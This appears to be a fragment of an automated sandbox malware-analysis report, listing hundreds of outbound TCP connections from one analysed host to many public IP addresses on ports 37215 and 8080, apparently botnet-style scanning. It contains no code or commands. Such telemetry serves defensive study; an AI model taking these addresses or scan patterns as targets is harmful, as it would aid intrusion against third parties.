            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.59.86.56:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.164.147.176:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.244.6.37:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 72.157.125.197:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.15.112.213:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.155.221.76:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.213.66.48:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.131.148.248:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.162.226.97:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 118.185.216.24:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.125.83.147:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.101.122.230:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.128.206.152:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.108.193.102:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.113.254.3:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.249.224.52:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 141.69.24.176:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.55.25.253:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 78.100.155.81:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.255.245.84:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 52.245.202.151:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.137.22.240:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.232.30.181:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.82.63.188:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.144.22.55:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.4.177.218:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.0.39.88:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.146.53.115:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.49.134.72:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.221.197.243:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.52.52.118:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.127.91.116:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.67.170.206:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.53.155.57:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 17.51.215.118:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.162.142.63:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.197.213.150:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.116.206.137:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.227.10.28:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.154.160.77:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 158.242.12.191:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 43.174.36.18:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.138.162.16:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.230.28.249:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.129.55.213:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.118.73.47:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.130.29.181:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 143.66.104.221:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.138.216.202:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.233.88.79:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.34.162.83:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.202.159.138:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 49.85.132.159:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.148.103.177:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.138.255.140:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 66.237.95.195:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.46.251.149:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.206.57.48:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.14.86.155:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.83.153.44:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.244.101.127:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 119.182.106.24:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.147.188.201:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.78.181.17:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.172.180.210:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 188.130.204.236:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 138.232.88.43:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.149.78.193:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.181.205.207:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.252.52.27:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.27.148.43:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 213.175.73.111:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.131.143.189:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 72.254.31.43:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 111.227.49.216:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.37.45.219:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 72.255.210.160:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.228.114.132:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.205.171.68:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 161.56.39.73:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.254.41.204:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.17.9.129:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.235.166.219:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.161.40.15:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.50.125.93:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.129.205.34:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.33.211.178:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 78.76.212.220:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.89.183.58:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 43.153.15.181:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.154.139.36:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.246.24.84:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.71.115.203:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.65.54.220:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 73.27.105.134:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 57.184.4.151:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.42.135.191:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 223.109.245.51:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 178.145.191.56:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.231.90.208:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.100.54.217:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 80.59.103.12:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.1.75.132:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 216.209.50.238:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.83.14.6:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.22.240.94:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.168.144.30:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.148.174.186:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.114.115.128:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.235.118.18:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 34.131.245.61:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.251.44.211:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.239.226.155:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.77.91.146:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 196.78.64.140:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.50.60.97:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 93.75.228.215:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.4.95.147:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.49.183.20:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 199.189.6.145:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.205.191.149:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.183.170.203:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 183.32.189.202:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.71.135.156:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.84.82.32:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 159.88.202.84:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.104.177.92:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 113.180.85.253:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.33.92.140:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.45.95.54:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.172.36.121:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.40.155.207:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.103.240.52:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.118.150.157:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 190.244.68.103:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.72.129.216:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.224.2.252:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 167.36.65.11:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.136.241.53:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.107.177.235:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.199.253.166:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 64.181.64.85:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.12.254.36:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.147.131.248:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 85.38.248.226:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.55.254.117:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 191.157.212.143:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 136.172.143.124:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.66.126.18:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 221.94.180.138:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 221.65.48.44:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.121.97.124:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.141.223.38:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.130.84.27:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 17.211.101.163:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.71.48.193:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.21.2.178:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.67.232.153:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.168.193.243:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.54.205.15:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.80.29.189:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.214.129.52:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 174.53.254.72:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 112.114.181.83:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.42.209.29:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 201.175.14.32:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.249.238.126:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 183.105.221.27:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 207.235.16.145:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.47.137.100:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.231.115.62:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.28.1.242:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 105.225.225.202:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.18.237.25:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.12.160.72:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.221.84.159:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.41.49.194:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 70.56.87.241:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.109.211.172:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.161.35.22:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.127.95.151:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.74.89.159:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 108.212.76.153:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.27.114.159:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 159.153.173.7:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.89.99.142:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.191.148.223:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.199.217.111:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 216.194.16.12:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.100.238.13:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.213.188.88:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.170.73.17:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.173.225.199:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.111.209.210:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.117.252.127:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.84.202.222:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 82.78.212.79:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.198.178.86:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 185.242.207.127:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.196.155.220:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.150.168.201:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.32.49.3:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.198.53.243:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.71.64.189:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 143.214.59.171:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.236.241.81:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.173.104.60:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.139.231.26:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 123.132.71.157:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.225.43.154:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.80.70.133:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.72.66.77:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 84.56.112.25:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 180.19.61.159:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.203.131.74:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.126.120.250:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 99.151.18.222:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.53.173.12:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.241.213.42:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.7.119.64:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.42.155.130:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.56.27.22:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.16.124.161:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.126.190.96:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 91.247.59.150:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.92.205.100:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 204.142.33.88:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.98.57.219:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 45.214.254.35:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.237.118.180:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.39.90.232:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.120.210.190:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 135.191.32.164:37215
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 76.219.21.56:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 166.52.236.140:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 195.64.57.140:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 88.41.9.3:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 160.12.160.91:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 159.108.136.183:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 146.50.150.176:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 59.157.105.142:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 143.139.248.14:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 219.89.116.15:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 41.162.4.29:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 19.24.192.9:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 143.202.49.48:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 14.30.57.5:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 121.97.217.43:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 164.53.82.117:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 163.13.19.44:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 186.226.135.23:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 176.237.23.119:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 170.44.26.159:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 206.47.93.133:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 136.111.185.221:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 156.102.169.120:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 188.92.155.27:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 74.55.52.142:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 80.126.146.158:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 212.59.185.244:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 101.140.107.233:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 199.86.183.212:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 166.126.58.131:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 193.220.218.10:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 206.255.208.98:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 175.209.16.87:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 48.46.235.206:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 92.14.185.185:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 166.3.149.134:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 51.30.219.240:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 164.133.28.97:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 19.167.9.199:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 164.172.146.225:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 47.46.38.167:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 51.119.142.230:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 205.47.245.200:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 126.7.163.49:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 201.193.59.219:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 9.7.200.69:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 50.213.166.236:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 83.101.117.230:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 174.79.59.78:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 91.171.166.22:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 86.67.108.102:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 185.16.77.17:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 99.58.201.201:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 219.250.19.89:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 146.127.128.134:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 167.215.99.119:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 147.187.108.38:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 164.203.67.245:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 122.129.7.90:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 206.226.62.141:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 105.154.229.223:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 115.237.152.155:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 133.172.24.64:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 142.135.165.184:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 197.253.219.188:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 95.85.239.242:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 123.91.91.188:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 13.93.72.104:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 205.58.38.67:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 116.122.127.164:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 31.193.75.218:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 196.184.38.140:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 182.29.127.235:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 43.42.151.226:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 223.247.105.131:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 65.86.119.248:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 4.234.205.255:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 13.128.215.66:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 34.39.250.244:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 88.235.219.198:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 190.111.64.60:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 47.78.150.212:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 18.131.29.73:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 37.225.158.88:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 207.20.238.57:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 142.167.214.175:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 75.96.142.129:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 185.119.57.239:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 94.123.190.232:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 193.222.90.194:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 170.240.137.164:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 123.11.178.54:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 116.171.101.166:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 204.231.77.54:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 59.73.20.115:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 93.222.248.212:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 24.171.250.63:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 118.218.207.129:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 4.213.193.185:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 219.213.109.125:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 116.158.23.233:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 191.152.43.5:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 121.132.158.229:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 69.223.98.5:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 208.63.202.178:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 37.230.173.224:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 86.8.167.12:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 49.46.206.185:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 59.130.146.198:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 188.63.224.95:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 37.10.70.85:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 207.18.239.39:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 204.108.60.143:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 196.50.98.235:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 80.157.219.170:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 131.224.138.166:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 132.99.132.33:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 183.27.111.43:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 188.24.91.255:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 169.4.108.176:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 198.241.236.49:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 89.132.210.149:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 150.5.187.91:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 100.6.248.73:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 74.87.225.20:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 9.200.171.38:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 211.6.30.125:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 186.130.182.46:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 179.108.93.15:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 63.80.68.236:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 141.166.50.185:8080
            Source: global trafficTCP traffic: 192.168.2.14:42646 -> 62.140.225.184:8080
